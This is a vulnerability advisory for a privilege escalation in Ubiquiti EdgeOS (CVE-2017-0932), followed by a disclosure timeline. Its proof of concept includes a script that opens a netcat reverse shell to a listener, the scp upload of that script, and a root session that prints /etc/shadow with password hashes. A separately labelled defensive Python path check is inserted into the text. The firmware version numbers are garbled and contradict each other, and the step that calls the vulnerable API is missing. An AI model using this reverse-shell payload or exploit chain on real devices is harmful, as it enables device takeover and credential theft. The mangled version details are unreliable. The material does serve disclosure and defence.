In UBNT EdgeOS version 126.96.36.199 and prior, as a consequence of the lack of input validation in the Feature functionality, an attacker with access to an operator (read-only) account and an SSH connection to the device can escalate privileges to admin (root) access on the system.
- Vendor: Ubiquiti Networks
- Device: EdgeRouter X
- Affected Version: 188.8.131.52 and prior
- CVE-ID: CVE-2017-0932
EdgeOS (firmware v184.108.40.206) is susceptible to a local privilege escalation due to a Path Traversal vulnerability in the Feature API. This vulnerability allows an attacker with non-privileged (read-only) access to execute commands on the device with root rights. The attack consists of sending a maliciously crafted file to the device (using scp with a non-privileged account) and then calling the vulnerable API, exploiting the Path Traversal. Exploitation results in the crafted file being executed with root permission, giving the attacker full access to the device.
First of all, we have to create the following directory and file:
    $ cat Backdoor/wizard-run
    #!/bin/bash
    /usr/bin/nc 192.168.2.2:1337 -e /bin/bash &
Using a non-privileged ‘operator’ user, it was possible to upload the file to the device using the scp command:
    $ scp -r Backdoor firstname.lastname@example.org:~
    Welcome to EdgeOS
    By logging in, accessing, or using the Ubiquiti product, you acknowledge that you have read and understood the Ubiquiti License Agreement (available in the Web UI at, by default, http://192.168.1.1) and agree to be bound by its terms.
    email@example.com's password:
    wizard-run
After that, using a valid operator session and a path traversal vulnerability, it was possible to call the uploaded file with root privilege:
And a remote shell will be created:
    $ nc -lvp 1337
    Listening on [0.0.0.0] (family 0, port 1337)
    Connection from 192.168.2.1 44440 received!
    id
    uid=0(root) gid=102(vyattacfg)
    uname -a
    Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux
    cat /etc/shadow
    root:!:17283:0:99999:7:::
    daemon:*:17283:0:99999:7:::
    bin:*:17283:0:99999:7:::
    games:*:17283:0:99999:7:::
    .. snip snip ..
    avahi:*:17283:0:99999:7:::
    sshd:*:17283:0:99999:7:::
    tss:*:17283:0:99999:7:::
    ubnt:$1$zKNoUbAo$gomzUbYvgyUMcD436Wo66.:16436:0:99999:7:::
    operator:$6$7SVNi.WB68V0QR5t$efMoCyT2H.mEU6M8s2NDSsW1fv7JnT2eAfK2VxuzsIdcYrEvWCILX8G0CYN/4enwrnT1yYjekQa95TxxHxhVj.:16436:0:99999:7:::
Upgrade the firmware to the latest available version.
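The kind of check whose absence the description above points to, as an added example (not Ubiquiti's code and not the fix shipped in the firmware): canonicalise the requested feature path and refuse anything that resolves outside the feature directory before its `wizard-run` script is executed. The function name, the `features` directory and the `vpn` feature are assumptions; the directory layout is constructed in a temporary directory.

```python
import os
import stat
import tempfile

SCRIPT_NAME = "wizard-run"  # file name taken from the advisory's proof of concept


def resolve_feature_script(base_dir, feature_name):
    """Return the canonical path of <base_dir>/<feature_name>/wizard-run.

    Raises ValueError if the name escapes base_dir or the script is not a
    regular file that only its owner can modify. (Hypothetical helper.)
    """
    base = os.path.realpath(base_dir)
    # realpath() collapses "../" segments and follows symlinks, so the
    # containment check runs on the path that would really be executed.
    target = os.path.realpath(os.path.join(base, feature_name, SCRIPT_NAME))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("feature path escapes %s" % base)
    st = os.stat(target)
    if not stat.S_ISREG(st.st_mode):
        raise ValueError("not a regular file")
    # Defence in depth: a script run as root must not be group/world writable.
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise ValueError("script is group/world writable")
    return target


def demo():
    """Constructed layout: one installed feature and an operator home dir."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "features")          # hypothetical install dir
    home = os.path.join(root, "home", "operator")  # where scp placed Backdoor/
    for d in (os.path.join(base, "vpn"), os.path.join(home, "Backdoor")):
        os.makedirs(d)
        with open(os.path.join(d, SCRIPT_NAME), "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(os.path.join(d, SCRIPT_NAME), 0o755)
    results = {}
    # A legitimate name, a relative traversal, and an absolute path.
    for name in ("vpn", "../home/operator/Backdoor", home + "/Backdoor"):
        try:
            results[name] = resolve_feature_script(base, name)
        except (ValueError, OSError) as exc:
            results[name] = "rejected: %s" % exc
    return base, results


if __name__ == "__main__":
    print(demo()[1])
```

The absolute-path case matters because `os.path.join` discards the base when the second component is absolute, which is why the containment test is applied to the resolved path rather than to the supplied name.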
- 2017-06-14 - Vulnerability discovered and first report to Ubiquiti Networks
- 2017-06-14 - UBNT answered and confirmed the vulnerability
- 2017-06-14 - Ubiquiti Networks rewarded with a $1,500 bounty
- 2017-08-30 - Ubiquiti Networks fixed the vulnerability
- 2017-11-24 - Ubiquiti Networks agreed with a partial disclosure of the vulnerability
- 2018-03-05 - Disclosure of technical details